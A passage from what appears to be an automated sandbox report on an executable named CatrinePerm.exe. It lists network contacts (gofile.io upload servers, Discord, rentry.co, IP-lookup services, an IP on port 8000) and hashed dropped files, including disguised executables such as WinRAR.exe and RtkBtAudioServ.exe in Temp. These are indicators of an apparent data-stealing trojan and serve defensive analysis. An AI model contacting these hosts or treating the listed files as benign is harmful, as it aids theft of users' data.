| US | 8.8.8.8:53 | store5.gofile.io | udp |
| FR | 31.14.70.250:443 | store5.gofile.io | tcp |
| FR | 31.14.70.250:443 | store5.gofile.io | tcp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| FR | 31.14.70.250:443 | store5.gofile.io | tcp |
| US | 8.8.8.8:53 | 250.70.14.31.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | rentry.co | udp |
| US | 104.21.95.148:443 | rentry.co | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 148.95.21.104.in-addr.arpa | udp |
| US | 104.21.95.148:443 | rentry.co | tcp |
| US | 104.21.95.148:443 | rentry.co | tcp |
| US | 104.21.95.148:443 | rentry.co | tcp |
| US | 104.21.95.148:443 | rentry.co | tcp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | textpubshiers.top | udp |
| US | 172.67.146.76:443 | textpubshiers.top | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.146.67.172.in-addr.arpa | udp |
| US | 172.67.74.152:443 | api.ipify.org | tcp |
| US | 8.8.8.8:53 | api.gofile.io | udp |
| FR | 51.178.66.33:443 | api.gofile.io | tcp |
| US | 8.8.8.8:53 | geolocation-db.com | udp |
| DE | 159.89.102.253:443 | geolocation-db.com | tcp |
| US | 8.8.8.8:53 | 152.74.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 253.102.89.159.in-addr.arpa | udp |
| US | 8.8.8.8:53 | store10.gofile.io | udp |
| FR | 31.14.70.252:443 | store10.gofile.io | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 252.70.14.31.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 40.13.222.173.in-addr.arpa | udp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 232.136.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 201.179.17.96.in-addr.arpa | udp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | store10.gofile.io | udp |
| FR | 31.14.70.252:443 | store10.gofile.io | tcp |
| SE | 78.69.106.17:8000 | tcp | |
| US | 8.8.8.8:53 | rentry.co | udp |
| US | 188.114.96.2:443 | rentry.co | tcp |
| FR | 31.14.70.252:443 | store10.gofile.io | tcp |
| US | 188.114.96.2:443 | rentry.co | tcp |
| US | 8.8.8.8:53 | 2.96.114.188.in-addr.arpa | udp |
| US | 188.114.96.2:443 | rentry.co | tcp |
| US | 188.114.96.2:443 | rentry.co | tcp |
| FR | 31.14.70.252:443 | store10.gofile.io | tcp |
| US | 188.114.96.2:443 | rentry.co | tcp |
| FR | 31.14.70.252:443 | store10.gofile.io | tcp |
| FR | 31.14.70.252:443 | store10.gofile.io | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 172.67.74.152:443 | api.ipify.org | tcp |
| US | 8.8.8.8:53 | api.gofile.io | udp |
| FR | 151.80.29.83:443 | api.gofile.io | tcp |
| US | 8.8.8.8:53 | geolocation-db.com | udp |
| DE | 159.89.102.253:443 | geolocation-db.com | tcp |
| FR | 31.14.70.252:443 | store10.gofile.io | tcp |
| US | 8.8.8.8:53 | store1.gofile.io | udp |
| FR | 45.112.123.227:443 | store1.gofile.io | tcp |
| FR | 45.112.123.227:443 | store1.gofile.io | tcp |
| US | 8.8.8.8:53 | 227.123.112.45.in-addr.arpa | udp |
| FR | 45.112.123.227:443 | store1.gofile.io | tcp |
| FR | 45.112.123.227:443 | store1.gofile.io | tcp |
| FR | 45.112.123.227:443 | store1.gofile.io | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| FR | 45.112.123.227:443 | store1.gofile.io | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| FR | 45.112.123.227:443 | store1.gofile.io | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| SE | 78.69.106.17:8000 | tcp | |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 91.16.208.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | checkip.amazonaws.com | udp |
| SE | 78.69.106.17:8000 | tcp | |
| IE | 34.252.239.71:80 | checkip.amazonaws.com | tcp |
| US | 172.67.146.76:443 | textpubshiers.top | tcp |
| US | 8.8.8.8:53 | 71.239.252.34.in-addr.arpa | udp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 188.114.96.2:443 | rentry.co | tcp |
| US | 188.114.96.2:443 | rentry.co | tcp |
| US | 188.114.96.2:443 | rentry.co | tcp |
| US | 188.114.96.2:443 | rentry.co | tcp |
| US | 188.114.96.2:443 | rentry.co | tcp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 172.67.74.152:443 | api.ipify.org | tcp |
| FR | 151.80.29.83:443 | api.gofile.io | tcp |
| DE | 159.89.102.253:443 | geolocation-db.com | tcp |
| FR | 31.14.70.252:443 | store10.gofile.io | tcp |
| FR | 31.14.70.252:443 | store10.gofile.io | tcp |
| US | 8.8.8.8:53 | store10.gofile.io | udp |
| FR | 31.14.70.252:443 | store10.gofile.io | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| FR | 31.14.70.252:443 | store10.gofile.io | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| FR | 31.14.70.252:443 | store10.gofile.io | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| FR | 31.14.70.252:443 | store10.gofile.io | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| SE | 78.69.106.17:8000 | tcp | |
| FR | 31.14.70.252:443 | store10.gofile.io | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | edge.msiserver.lan | udp |
| SE | 78.69.106.17:8000 | tcp |
Files
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | a774512b00820b61a51258335097b2c9 |
| SHA1 | 38c28d1ea3907a1af6c0443255ab610dd9285095 |
| SHA256 | 01946a2d65e59b66ebc256470ff4861f32edee90a44e31bf67529add95cafef4 |
| SHA512 | ce109be65060a5e7a872707c6c2ccce3aacd577e59c59d6e23e78d03e3d502f2707713fda40a546ed332e41a56ef90297af99590a5ab02f686a58bcbf3a82da1 |
\??\pipe\LOCAL\crashpad_2192_YDLQTUUBHVNRHMYX
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | fd7944a4ff1be37517983ffaf5700b11 |
| SHA1 | c4287796d78e00969af85b7e16a2d04230961240 |
| SHA256 | b54b41e7ce5600bc653aa7c88abb666976872b2d5e2d657bfc1147a0b49e9d74 |
| SHA512 | 28c58a2ccf39963a8d9f67ea5b93dbccf70b0109b2c8a396a58389cdec9db1205523a95730485bcbc9d533867cbf0e7167ad370fd45740e23656d01d96ee543b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 29ed269ef175af0550f5f675e933a7e5 |
| SHA1 | 70c3b9af8b130bfd009fce429d9eda4a87d372ff |
| SHA256 | 111da147e556cd2eef99cb56d55974dadb2f5b4045550e2a63b0c2dee700b3b8 |
| SHA512 | 5f6eee4c8486a843029632d8bc9e29654fb5cac23446bfa20f1cabd53f8d466c10dbf35e8a444102a779448e213b2d00eefe3605cbfaaec26d5d750c670887e5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
| SHA256 | 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd |
| SHA512 | 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | fed54abe92b2e2d6ce2e2ced704f03e1 |
| SHA1 | 7946f39a194c2ff91de8cc369b6f0f060feba33e |
| SHA256 | e0f3a0ba1d26506c2bf0976da0ba91a23d3f978c34b61464015476a38fd74ee3 |
| SHA512 | 0a288549e747a6fd7e9fa3ad6be99c762c27a2e8a2506518d7f9188c724f7379be7f3de6e348867de8056df117bd22f58da6f448666340ab4f0313fc53d98fdf |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | f9c4a76a174bfb14e9e993fa6289e19f |
| SHA1 | b0a4692fd9a911ce4c330a6db02f4811c9ca5204 |
| SHA256 | e285a0fccf1be8f01fb8071bd055a6a853baf6396c5747106d8cdca810ffec27 |
| SHA512 | 0e4b3dbcfdba173f6f0ec13b2f2fdb2b86e32305a0bcc8c6ce309926f71538c4e247b5d240198b0d4842ce2741820761781586c14b0df8f73d3f99d5d9026d49 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | a79818debcca4bf07d37ce337ca05b7f |
| SHA1 | db45dedd850f925af60d1c8bf0b108c98af05dbd |
| SHA256 | 28823ad8bf6e8f315e583b7029e97c32496f0ab6686779a19aebfeb1cea82cec |
| SHA512 | b1e00b4038ee4bc59a7505b2aead6229a224716b5e53ad0b8c3c4fb5ef9107db19ed824d84a8781f17e9fc1d485bf857e8fbd111ec2c5cf6aed67a81b4181434 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 285252a2f6327d41eab203dc2f402c67 |
| SHA1 | acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6 |
| SHA256 | 5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026 |
| SHA512 | 11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | db14b8328f962dc93e24053c0c1a22dd |
| SHA1 | 31b105d214422a6c1f854d6164ce59f24dd7081f |
| SHA256 | 174e31faeeb4ef44e83fcbbe6950ba214b07f3a4ba9e15142c0f2e4aa03d4dde |
| SHA512 | fcf0beb7ba47980e3d44c6570debc3e39ea77379f674adfd3bb037f3293c37890238598267518398f3fdfdce32053f8753d90da2e8b49216cb212696ddffd521 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 0f7c11a8272eadcc5302f9f24dccba37 |
| SHA1 | 7ee6940e7ff89c41a538ecc783c5fbcf06597e2d |
| SHA256 | a638b5b60339d222c0f388768c9891a0ed893d34b8e6e1aa11719abb0a2fefc0 |
| SHA512 | 93a4ee4899cde04321c6e6186c6b24220b9d90b28af2e28d34f279dc7016d1d08246cd26aff2a905b17a51a93e3222eb42142d062964999577c6d72cb21aab66 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 5b37b28d6b2130e3c7b3b5f7c39a01d3 |
| SHA1 | c80a8ff01312c98e669e613bbcb6237a590bfc1d |
| SHA256 | 75b42a2f01f5e03a32dfcd8c8c7858f2bf91c8fcaa1bb9521342b424694622d3 |
| SHA512 | d85bb43df86a8e5d416f344b6000c848fed41a23d5cadcae5f4dbcb113de8d89f8137ee30f03c06a4143de19d81cc664553c3ab0edb955a14d705759acbea195 |
C:\Users\Admin\Downloads\CatrinePerm.rar
| MD5 | be9cedd5e971451825399d5deb204a0d |
| SHA1 | 7a05d714638ef1423da7418f71e45126010ce4ab |
| SHA256 | 5bde596c5dfbe136b65c0e34c38512a97c9222abd3bcffdefb8032375ec5489d |
| SHA512 | 98b93fe0c8a8388a517a5ed71098b54cdf854273f27803da2a139d3ea4ddc218d77a3df75f685db89c4011067f40d0b88fc29dcc5370c97352ca08233ecc1153 |
C:\Users\Admin\Downloads\CatrinePerm\CatrinePerm.exe.WebView2\EBWebView\Default\Extension State\CURRENT
| MD5 | 46295cac801e5d4857d09837238a6394 |
| SHA1 | 44e0fa1b517dbf802b18faf0785eeea6ac51594b |
| SHA256 | 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443 |
| SHA512 | 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23 |
C:\Users\Admin\Downloads\CatrinePerm\CatrinePerm.exe.WebView2\EBWebView\Default\Extension State\MANIFEST-000001
| MD5 | 5af87dfd673ba2115e2fcf5cfdb727ab |
| SHA1 | d5b5bbf396dc291274584ef71f444f420b6056f1 |
| SHA256 | f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4 |
| SHA512 | de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b |
C:\Users\Admin\Downloads\CatrinePerm\CatrinePerm.exe.WebView2\EBWebView\Default\Shared Dictionary\cache\index
| MD5 | 54cb446f628b2ea4a5bce5769910512e |
| SHA1 | c27ca848427fe87f5cf4d0e0e3cd57151b0d820d |
| SHA256 | fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d |
| SHA512 | 8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0 |
C:\Users\Admin\Downloads\CatrinePerm\CatrinePerm.exe.WebView2\EBWebView\GrShaderCache\data_2
| MD5 | 0962291d6d367570bee5454721c17e11 |
| SHA1 | 59d10a893ef321a706a9255176761366115bedcb |
| SHA256 | ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7 |
| SHA512 | f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed |
C:\Users\Admin\Downloads\CatrinePerm\CatrinePerm.exe.WebView2\EBWebView\ShaderCache\data_3
| MD5 | 41876349cb12d6db992f1309f22df3f0 |
| SHA1 | 5cf26b3420fc0302cd0a71e8d029739b8765be27 |
| SHA256 | e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c |
| SHA512 | e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e |
C:\Users\Admin\Downloads\CatrinePerm\CatrinePerm.exe.WebView2\EBWebView\ShaderCache\data_1
| MD5 | a0a05fb0686d1acec29d34e283fd196a |
| SHA1 | 9b3f342179c9a4e11efd7ac46b8280a5a5c35963 |
| SHA256 | 83770e59f56fced3438319cb1ceb7c2005e793589c7b35ddfb089120800e1436 |
| SHA512 | 205bf28086b41d1a403c4abc968ce46d814b927615ad8e4503e579072057bc4a64ee81ba16781370c8621d2f16f8b1ccc985d2b5263186dd961292fc38270c89 |
C:\Users\Admin\Downloads\CatrinePerm\CatrinePerm.exe.WebView2\EBWebView\ShaderCache\data_0
| MD5 | cf89d16bb9107c631daabf0c0ee58efb |
| SHA1 | 3ae5d3a7cf1f94a56e42f9a58d90a0b9616ae74b |
| SHA256 | d6a5fe39cd672781b256e0e3102f7022635f1d4bb7cfcc90a80fffe4d0f3877e |
| SHA512 | 8cb5b059c8105eb91e74a7d5952437aaa1ada89763c5843e7b0f1b93d9ebe15ed40f287c652229291fac02d712cf7ff5ececef276ba0d7ddc35558a3ec3f77b0 |
C:\Users\Admin\Downloads\CatrinePerm\CatrinePerm.exe
| MD5 | 29c66ded1b50b1c13a228d29d608d95c |
| SHA1 | a242490eaf0b9e0bd71dbdae1f9d444afdeb8116 |
| SHA256 | 40d15db264c001fff4948e4e8737b4733e88c1e8ac6d2a26b64f8c0eaa6c244b |
| SHA512 | 1d6bc7c4aa610439ab3dc995b06749283bda03c2acf41544a2d26efe9814ec7ed7819d55eb550436fd0c2964ab4e6748370fb6e00a954f4fd69a7fea30edfca8 |
C:\Users\Admin\Downloads\CatrinePerm\CatrinePerm.exe
| MD5 | c79315753f8eca50bc7281959725587a |
| SHA1 | 88b42c751c8aeeaf76b0b6bd3f266eff7f608b4a |
| SHA256 | accc474815f0020bd89900dfe3cd7f52bd1c49cc6c69ee7470ff9e12e7699ed1 |
| SHA512 | 03bb58aa39c14f55d39a7e42e39733e3645dfc884dc789d1d52cea74eb0dcfe63c2e282f19e26a9624eec6b57ecf143d0a224b9bf4f3bd45a4a10bec4d8bcac6 |
memory/5916-668-0x00007FFE63970000-0x00007FFE64431000-memory.dmp
memory/5916-669-0x00000000003A0000-0x0000000000EDE000-memory.dmp
C:\Users\Admin\AppData\Roaming\Win (3).exe
| MD5 | 181a5e1c1238407657c399a6195e2a0f |
| SHA1 | ed41ca6ba40433de12c93c5b7df9b3a5c4683017 |
| SHA256 | 3260ef60eb7691ebc2741e24db06c644c30709c1d93efcac521b47e51c4f2446 |
| SHA512 | e0f1ee2de2ca7fb3354affe079318b54846c9afcfba9fe25b4ef17e7dac1b2e28dc3bc481c162cd9576ef58385ef9ebba5c5870f678d37cfb2d924f71d0155b3 |
C:\Users\Admin\AppData\Roaming\Win (3).exe
| MD5 | 5f8136e9c87c5cd15107a16c93b2410e |
| SHA1 | fd76478c14937669b96185ee1a79c171a9200fd4 |
| SHA256 | a53b3cc4736d3277de809b1f29243f80e62111ee445083719f50a217cd531d94 |
| SHA512 | 131c358ea431f62e697decbf92024137db22ce8a8abec2791288d70eb2158487d5648b89a809a6287755a37f467ab319dc5c0f72f30372e3954b42c32ea06c83 |
C:\Users\Admin\AppData\Roaming\CatrinePerm.exe
| MD5 | 10605ec186aacb6a4b3dde419cb0b5e5 |
| SHA1 | 9c41040a4c238dec28c4f47bfb0a28a3cd4bf19d |
| SHA256 | ca5b3ebffc2080fec7d44655069190b892e51e4bc4401c31f64a5a70d46f1ead |
| SHA512 | 1d48bbc5c965f098300ce5404269ea5b1694887531b9aa1e953755f631325946e4914405ae3cabfe13d222ddfde4b0368d446b9aad3956f345d6b142d6579a9d |
C:\Users\Admin\AppData\Roaming\Win (3).exe
| MD5 | 52da4b0958f918e69e41e524c0b0ebb4 |
| SHA1 | 74296722e0653c640eec9f555f0c9042b3805799 |
| SHA256 | c1ab6c02354188c6e26b4feb5db7f7b6fa36719defa160b053937acd2ba4a745 |
| SHA512 | 8a9040f4d8ae74151585713318b7235e5a162c5573ddc0389691d5f10d1aa15d8f6a6900235e597c8e291e87bdfc87addc36485eabab7f6755f1af4455d6ca5b |
memory/5216-702-0x00007FFE63970000-0x00007FFE64431000-memory.dmp
memory/5916-703-0x00007FFE63970000-0x00007FFE64431000-memory.dmp
memory/5216-704-0x00000000002E0000-0x0000000000DF8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\WinRAR.exe
| MD5 | 3eda75ddf0da931a8b305573d7508e8c |
| SHA1 | d19618faac5e98152797aa94860725827dae4359 |
| SHA256 | c66e4c3be01e7830f7e564ce3139c774eed746c7db619b767e4f1f6e83c52cb9 |
| SHA512 | 32d05e9c0fe66fee74d67ec20ea33b9332e5a077ef6e8ae26956e00fc839cdd9a840fcd944e33dd8655395588ab74e9768e1ea6210c234a0d60d14e560d544d0 |
memory/5420-716-0x0000000000B50000-0x0000000000B82000-memory.dmp
memory/5420-717-0x00007FFE63970000-0x00007FFE64431000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | a76d8ae9523bcf5bb2caa451121a0d91 |
| SHA1 | 4867caa19f280aabdc4f85f6468335d70ad1d996 |
| SHA256 | 515a528f05f0c708175813df2e149b0960d193bd4dac47a11a7641745c8a063b |
| SHA512 | 9dbab2a7c6ce09335a805a319399b95ad818c94153d57818cdf30cd26f825ab4517d15dca8bf4156a0aab5a24a6c06977ddb5f9d27f4be8f601a813dc88b9a57 |
C:\Users\Admin\AppData\Local\Temp\pythonw.exe
| MD5 | b3aa2402a8f70a4ff6e85637bf82cef8 |
| SHA1 | afbe1b7c1b2eac15839c5cccb3410068d67331d3 |
| SHA256 | e0edba7789c5cc1738db332512ef2237bee9baff202306e887cab5e4cc69ada8 |
| SHA512 | 45489f4645443761b553d4ebe212f1969be652783cb911f68234172eed32a573475c61883d239c4be2bd4246a03a135722c7149dc1e61262eff04ffd38b5a1f6 |
C:\Users\Admin\AppData\Local\Temp\RtkBtAudioServ.exe
| MD5 | 9dfb70a009d9a1696a1a55d17b0321a5 |
| SHA1 | 0129fcc88ba5c5bb58e8cf0e8860b3b53dbec7a9 |
| SHA256 | 4eba44c61669a2d7c77b7997846b0d779989d4fff31120caeca595887576c19b |
| SHA512 | 0f18f936de567c884d284cd00d9c5953c89865776ef3adc8e7c4de801dda4548c9d1998f222011ca66d567d64c2ad6bfd10050987ec216f9c14844edfb5c6d73 |
C:\Users\Admin\AppData\Local\Temp\pythonw.exe
| MD5 | ae2901c87dc043f55ef4119d6582572d |
| SHA1 | c0404a09b9fd17d71da19b6e6d228c765ebd0f63 |
| SHA256 | 7115c28e5ba30c8a64ad4311bb924ddea53b89d7e3a5979319a27d2f2d1861ed |
| SHA512 | 93d81b849fd5366f21e218eb22bf07e09bbaa7b4cca77cc22a01586f8eb5e5f33cf2095272153ca8060c87fe5aed08e1d54ac787d88418a35fe6656c9ec14dcf |
C:\Users\Admin\AppData\Local\Temp\pythonw.exe
| MD5 | 5416a44bafb404eae9004b1b770a3225 |
| SHA1 | 90dfb5e1528069606f26328106d49be22eb2102a |
| SHA256 | 3a2cd09a02203573ac71f91a0fc35a0613de2f50151932c53383b4ad19a3dbf0 |
| SHA512 | d89f55bf2e12672632b2445d9e03f77257e7cb4f71e24d18bb541ef2529c40b5795d4e0012634b37aa5a85065b4b4a7b8d45ae32329be619a64855bc8eb0d76f |
memory/5216-835-0x00007FFE63970000-0x00007FFE64431000-memory.dmp
memory/5508-848-0x0000000000F70000-0x0000000000F7A000-memory.dmp
memory/5420-851-0x000000001B8B0000-0x000000001B8C0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\pythonw.exe
| MD5 | ffe171f8f390c6e6ea900b681d8eb1ec |
| SHA1 | 0f8f3c8330bfd0d75ac29de55905886d9bb023f3 |
| SHA256 | f4c550467a2a69fd97d98aa85e62a3df99d9776d18deb5b8a2a3b7b5944f95eb |
| SHA512 | ce5f70530e43b90d317d3ba6ed125d26baf82a2fb096b9c45196e2356fc55970bb18e29d5110c004b6375f55466dcc2e7e0305aaa4e46fb5bfc7c44bed9321b2 |
C:\Users\Admin\AppData\Local\Temp\_MEI52802\python311.dll
| MD5 | 965408ab7d160b37ed1d8819634a6660 |
| SHA1 | 30611abb15124919dab1096a517aae36c3c95ea7 |
| SHA256 | 9f0566e72a2a465cb888f64dd0f9db95e84e0a762575dbd31b13c1e6bb63b3b5 |
| SHA512 | b3f0e075187b44affeb62526cfef08544072eb507d186df45a9dee9c4355d14a9590c082cca2ae1dee65786ebabec23824d772189ac5ca196b32ded80891bd8f |
memory/5508-856-0x00000000031B0000-0x00000000031CA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI52802\ucrtbase.dll
| MD5 | 0e0bac3d1dcc1833eae4e3e4cf83c4ef |
| SHA1 | 4189f4459c54e69c6d3155a82524bda7549a75a6 |
| SHA256 | 8a91052ef261b5fbf3223ae9ce789af73dfe1e9b0ba5bdbc4d564870a24f2bae |
| SHA512 | a45946e3971816f66dd7ea3788aacc384a9e95011500b458212dc104741315b85659e0d56a41570731d338bdf182141c093d3ced222c007038583ceb808e26fd |
memory/5508-847-0x00000000744B0000-0x0000000074C60000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI52802\VCRUNTIME140.dll
| MD5 | be8dbe2dc77ebe7f88f910c61aec691a |
| SHA1 | a19f08bb2b1c1de5bb61daf9f2304531321e0e40 |
| SHA256 | 4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83 |
| SHA512 | 0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655 |
C:\Users\Admin\AppData\Local\Temp\_MEI52802\base_library.zip
| MD5 | 81cd6d012885629791a9e3d9320c444e |
| SHA1 | 53268184fdbddf8909c349ed3c6701abe8884c31 |
| SHA256 | a18892e4f2f2ec0dee5714429f73a5add4e355d10a7ba51593afc730f77c51dd |
| SHA512 | d5bf47fad8b1f5c7dcaa6bef5d4553e461f46e6c334b33d8adc93689cf89365c318f03e961a5d33994730b72dc8bde62209baca015d0d2d08a081d82df7dfd73 |
C:\Users\Admin\AppData\Local\Temp\_MEI52802\python311.dll
| MD5 | 86e0ad6ba8a9052d1729db2c015daf1c |
| SHA1 | 48112072903fff2ec5726cca19cc09e42d6384c7 |
| SHA256 | 5ecda62f6fd2822355c560412f6d90be46a7f763f0ffeec9854177904632ac2d |
| SHA512 | 5d6e32f9ff90a9a584183dad1583aea2327b4aea32184b0ebbec3df41b0b833e6bb3cd40822dd64d1033125f52255812b17e4fa0add38fcda6bab1724dfaa2eb |
C:\Users\Admin\AppData\Local\Temp\_MEI52802\_ctypes.pyd
| MD5 | 78df76aa0ff8c17edc60376724d206cd |
| SHA1 | 9818bd514d3d0fc1749b2d5ef9e4d72d781b51dd |
| SHA256 | b75560db79ba6fb56c393a4886eedd72e60df1e2f7f870fe2e356d08155f367b |
| SHA512 | 6189c1bd56db5b7a9806960bc27742d97d2794acebc32e0a5f634fe0ff863e1775dcf90224504d5e2920a1192a3c1511fb84d41d7a2b69c67d3bdfbab2f968fa |
